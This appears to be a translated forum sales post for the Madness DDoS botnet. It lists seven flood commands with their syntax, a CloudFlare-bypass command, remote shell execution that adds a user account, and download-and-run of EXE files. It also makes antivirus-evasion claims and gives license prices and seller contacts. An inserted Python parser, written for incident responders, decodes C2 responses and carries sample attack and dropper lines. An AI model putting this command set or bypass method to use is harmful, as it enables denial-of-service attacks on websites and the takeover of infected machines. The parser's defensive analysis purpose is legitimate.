Detection:
A check of the build (without crypting and packing) showed only 3 of all the anti-virus engines raising a suspicion (AVIRA, ClamAV, VBA32). In tests against the key local AVs (Kaspersky, Nod32, DrWeb, Avast), the file was missed in 100% of cases.
Attack modes and commands
Since this is a professional system, the command syntax resembles Darkness.

dd1: basic mode of operation, HTTP GET using raw sockets.
Supports ***cookies and $$$ref, and allows up to 10 targets at once (separated by ";").
The fastest attack by request volume.
Example: dd1=[link hidden by forum]***cookies$$$referal;[link hidden by forum]***cookies2$$$referal2

dd2: same handling as dd1, but with the POST method.
Adds the optional parameter @@@post_data.
Also supports up to 10 targets.
Example: dd2=[link hidden by forum]***cookies$$$referal@@@login=yyy&password=hhh

dd3: HTTP GET attack using the system library WinInet.dll.
The good old attack used in many Delphi bots.
Slow because of Microsoft Windows limitations.
Does not support referer and cookies; supports up to 10 targets.
Example: dd3=[link hidden by forum]

dd4: HTTP POST attack using the system library WinInet. Same as dd3, but POST.
Example: dd4=[link hidden by forum]@@@login=yyy&password=hhh

dd5: ICMP attack (pings). Supports up to 10 targets.
Example: dd5=198.168.0.1;199.0.0.1

dd6: UDP attack. Supports up to 10 targets. Required parameters: port and text.
Example: dd6=192.168.0.2:27015@@@flud_text

dd7: HTTP GET attack using the system library UrlMon.dll.
A medium-speed attack that supports up to 10 targets and does not support cookies or referer.

cfa: command to bypass CloudFlare protection (!). Used ONLY together with dd7.
Does not stop the dd7 command.
The idea is simple: the bot executes the JavaScript, obtains the required cookie, and CloudFlare treats the requests made by dd7 as authorized.
Example: dd7=[link hidden by forum], then (after fifteen minutes) cfa=[link hidden by forum]

cmd: executes a command in the cmd.exe command interpreter on the local machine.
Does not stop the execution of other commands.
Example: cmd=net user goodwin /add

exe: downloads and runs an EXE file.
Does not stop the execution of other commands.
The file is saved under the same name it had on the internet.
Three attempts are made to download the file.
Example: exe=[link hidden by forum]
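For a responder who has captured a panel response or pulled a task list from an infected host, the command syntax listed above can be decoded into a target list, dropper URLs and shell commands for blocking and hunting. The following is an added example written for this page, not the bot's or the panel's own code. It assumes one command per line in "name=value" form and that the separators (";", "***", "$$$", "@@@") appear without spaces (the spaces in the examples above are extraction artifacts); the sample response is constructed from documentation addresses and is not captured traffic.

```python
"""Decode Madness/Darkness-style bot commands found in a captured C2 response,
so a responder can list attack targets, dropper URLs and shell commands.
Added example; not the bot's or the panel's own code."""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# Separators as described in the post (assumed to appear without spaces).
TARGET_SEP, COOKIE_SEP, REFERER_SEP, POST_SEP = ";", "***", "$$$", "@@@"

# Fields each attack mode carries, per the descriptions of dd1..dd7 above.
MODE_FIELDS = {
    "dd1": ("url", "cookies", "referer"),          # HTTP GET over raw sockets
    "dd2": ("url", "cookies", "referer", "post"),  # HTTP POST over raw sockets
    "dd3": ("url",),                               # HTTP GET via WinInet
    "dd4": ("url", "post"),                        # HTTP POST via WinInet
    "dd5": ("host",),                              # ICMP flood, bare addresses
    "dd6": ("host", "port", "post"),               # UDP flood: ip:port@@@text
    "dd7": ("url",),                               # HTTP GET via UrlMon
}
# Assumption: one command per line, "name=value"; anything else is ignored.
CMD_RE = re.compile(r"^\s*(dd[1-7]|cfa|cmd|exe)\s*=\s*(.*?)\s*$")


@dataclass
class BotCommand:
    name: str
    raw: str
    targets: list = field(default_factory=list)  # one dict per ';' target
    arg: Optional[str] = None                    # payload of cfa / cmd / exe


def parse_target(mode: str, chunk: str) -> dict:
    """Split one target into the fields its mode defines, peeling the
    optional suffixes off from the right (post, then referer, then cookies)."""
    fields = MODE_FIELDS[mode]
    t = {"raw": chunk}
    rest = chunk
    if "post" in fields and POST_SEP in rest:
        rest, t["post"] = rest.split(POST_SEP, 1)
    if "referer" in fields and REFERER_SEP in rest:
        rest, t["referer"] = rest.split(REFERER_SEP, 1)
    if "cookies" in fields and COOKIE_SEP in rest:
        rest, t["cookies"] = rest.split(COOKIE_SEP, 1)
    if "url" in fields:
        t["url"] = rest
        t["host"] = urlsplit(rest).hostname or rest
    elif "port" in fields and ":" in rest:
        host, port = rest.rsplit(":", 1)
        t["host"] = host
        t["port"] = int(port) if port.isdigit() else None
    else:
        t["host"] = rest
    return t


def parse_command(line: str) -> Optional[BotCommand]:
    """Return a BotCommand for a recognised line, None otherwise."""
    m = CMD_RE.match(line)
    if not m:
        return None
    name, value = m.group(1), m.group(2)
    cmd = BotCommand(name=name, raw=line.strip())
    if name in MODE_FIELDS:
        # The post says the bot takes up to 10 ';'-separated targets; keep all
        # of them here, since a responder wants every target that was issued.
        chunks = [c.strip() for c in value.split(TARGET_SEP) if c.strip()]
        cmd.targets = [parse_target(name, c) for c in chunks]
    else:
        cmd.arg = value
    return cmd


def scan(text: str) -> list:
    """Decode every recognised command in a captured response."""
    return [c for c in map(parse_command, text.splitlines()) if c is not None]


def indicators(commands) -> dict:
    """Collect what a responder would block or hunt for."""
    out = {"attack_hosts": set(), "download_urls": set(), "shell_commands": []}
    for c in commands:
        for t in c.targets:
            out["attack_hosts"].add(t["host"])
        if c.name == "exe":
            out["download_urls"].add(c.arg)
        elif c.name == "cmd":
            out["shell_commands"].append(c.arg)
    return out


# Constructed sample response (RFC 5737 addresses, .test names), not captured traffic.
SAMPLE_C2_RESPONSE = """\
dd1=http://192.0.2.50/index.php***PHPSESSID=abc123$$$http://192.0.2.50/;http://shop.example.test/cart***sid=1$$$http://shop.example.test/
dd2=http://192.0.2.50/login.php***c=1$$$http://192.0.2.50/@@@login=yyy&password=hhh
dd6=192.0.2.10:27015@@@flud_text
cmd=net user goodwin /add
exe=http://203.0.113.7/update.exe
<html>unrelated panel output that must be ignored</html>
"""

if __name__ == "__main__":
    found = scan(SAMPLE_C2_RESPONSE)
    for c in found:
        print(c.name, c.targets or c.arg)
    print(indicators(found))
```

The suffixes are stripped from the right so that a URL or post body containing ":" is not mis-split, and attack targets are kept separate from the exe download URL, since the former go on an egress blocklist while the latter is a dropper indicator to hunt for on other hosts.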
Control Panel:
We used a 70%-modified version of another product (purchased under a contract for modification and resale), rewriting it almost completely, since too many mistakes were found and we did not like the code. Of course everything was corrected and optimized. New control panel, enjoy!
Prices:
- Test license: $0 (only for forum checks and testers; updates are not provided)
- Basic license: $500 (update/rebuild $50, upgrade to a new version $100; module prices will be set later)
- Full license: $950 (all updates, rebuilds and modules are free)
CloudFlare protection bypass.
The CloudFlare protection system is based on identifying the browser by running JavaScript in it, after which the client is issued a unique cookie.
A bot, like a browser, can in theory run JavaScript. The great difficulty is fitting the required set of mathematical functions into the modest size of the bot build; however, some instances cope with the task!
Consider the example of a test server, [link hidden by forum], protected by the CloudFlare system + Madness 1.08:
1) The botnet is given the command dd7=[link hidden by forum]; the bots then start requests to the server using the system library UrlMon.
As can be seen in the server logs and the sniffer, the bots get a 302 back, which means the protection is working.
2) The botnet is given the command cfa=[link hidden by forum]; the bots request the authorization cookie.
By executing the JavaScript, each bot obtains a unique cookie (for its IP and user agent) which it immediately includes in the packet header.
The logs show that requests to the server now arrive in normal mode and the returned content matches the content of the site!
Q) Why can't this be done automatically?
A) Depending on the security settings, the cookie can change at an arbitrary interval and the authorization has to be passed again.
So far automation cannot cope with this the way a professional person does. Too frequent a check interval greatly reduces the usability of the site, as ordinary users would see the CloudFlare check every few seconds.
Q) Can I use this method all the time, for any purpose?
A) It is possible, but not recommended. dd7 is itself a slow attack compared with dd1, and the load is increased further by preparing the special packet needed to bypass the protection.
Project news
From today we are working with another seller: iSupport (709186)
ICQ: 902300, 903400, 709186
JAB: damrai13@jabber.ru
Note: incconfig.php has to be writeable.
Note 2: The panel is a modded Darkness (Optima) by myself (no RU language); if you have the original one for Madness, please send it over...